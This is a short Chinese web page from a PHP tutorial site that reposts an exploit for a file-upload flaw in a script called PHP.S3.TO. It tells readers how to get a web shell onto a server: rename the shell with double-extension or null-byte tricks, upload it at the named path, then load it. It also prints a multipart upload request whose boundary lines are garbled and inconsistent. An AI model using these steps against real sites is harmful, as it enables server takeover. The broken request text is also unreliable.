网站地图    收藏   

主页 > 后端 > 网站安全 >

PHP.S3.TO上传漏洞利用 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 这个网页漏洞比较严重,可以直接获取shell,下面给出漏洞利用方法漏洞信息:可以任意上传PHP,TXT,JPG,PNG格式文件change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg利用:www.2cto.com /[dir......

这个网页漏洞比较严重,可以直接获取shell,下面给出漏洞利用方法
  
漏洞信息:
 
 
可以任意上传PHP,TXT,JPG,PNG格式文件
change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg
 
 
利用:
 
 
www.2cto.com /[dir]/up/upload.php
 
加载的文件:
 
www.2cto.com /[dir]/up/img/Sh3ll.php.jpg
 
 
 
漏洞核心代码:
 114782935826962\r\nContent-Disposition: form-data;
 
name="MAX_FILE_SIZE"\r\n\r\n1048576\r\n-1147829358
26962\r\nContent-Disposition: form-data;name="upfile";
filename="sh3ll.php.jpg"\r\nContent-Type: text/plain\r\n\r\n\r\n
-----------------------------114782935826962\r\nContent-Disposition:
form-data; name="pass"\r\n\r\n\r\n--114782935826962\r\nContent-Disposition:form-data;
name="com"\r\n\r\n\r\n-----------------------------114782935826962--\r\n

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论